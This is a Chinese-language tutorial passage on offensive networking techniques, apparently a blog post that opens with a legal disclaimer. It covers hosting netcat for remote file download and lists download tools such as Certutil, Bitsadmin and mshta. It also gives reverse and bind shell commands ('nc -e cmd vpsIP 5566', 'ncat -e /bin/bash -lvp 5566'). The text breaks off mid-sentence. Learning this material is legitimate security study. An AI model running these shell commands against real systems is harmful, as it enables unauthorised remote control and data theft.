免责声明
本免责声明适用于作者所有文章内容。使用者需明确,网络安全技术仅供学习和合法研究使用,不得用于任何非法活动,如未经授权的入侵、攻击或数据窃取,所有相关法律责任由使用者自行承担。由于网络安全操作可能带来系统崩溃、数据丢失等风险,使用者应对其操作后果有充分认知,并自行承担任何损失或不良后果。作者和提供者不对因使用这些技术引发的任何损害或法律责任负责,所有资源仅供学习参考,不建议用于生产环境。同时,所有内容遵循公开共享原则,使用者在引用或传播时应遵守相关规定并承担责任。
远程文件下载
我们现在宝塔上安装linux环境并在127.0.0.1中加入自己的公网ip,
找到nc的官网,将netcat 1.11 for Win32/Win64下载到我们的网站目录下。
尝试访问自己的公网IP+文件名。
能够进行下载说明可以进行远程文件下载了。
打开[~]#棱角 ::Edge.Forum* -----》文件下载工具
根据自己的vpsIP、端口和文件名进行填写
可以使用命令进行一键远程下载
#实用案例1:文件上传下载-解决无图形化&解决数据传输
命令生成:https://forum.ywhack.com/bountytips.php?download
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等
直接将上面的命令执行即可。
反弹shell
要控制内网的某一台机器的权限
(1)内网机器把自己的命令行给到外网服务器的某个端口,外网服务器进行监听(唯一方法)
(2)如果内网把命令行权限给到本地某个端口,那外网服务器如果要获得权限,那么必须在路由器上做端口转发,也就是端口映射
连接实验
外网机器控制内网机器
只能主动给出去权限,这里不做演示了
内网机器:nc -e cmd vpsIP 5566
外网机器:ncat -lvp 5566
这样就可以让外网机器控制内网机器了。
内网机器控制外网机器
这个只需要外网机器把权限给到本地的5566,然后内网机器去连接
内网机器:nc vpsIP 5566
外网机器:ncat -e /bin/bash -lvp 5566
正向连接(Forward Connection)
通常指的是客户端主动向服务器发起连接的行为。这种连接模式是网络通信中的常见模式,客户端会通过发送请求来与服务器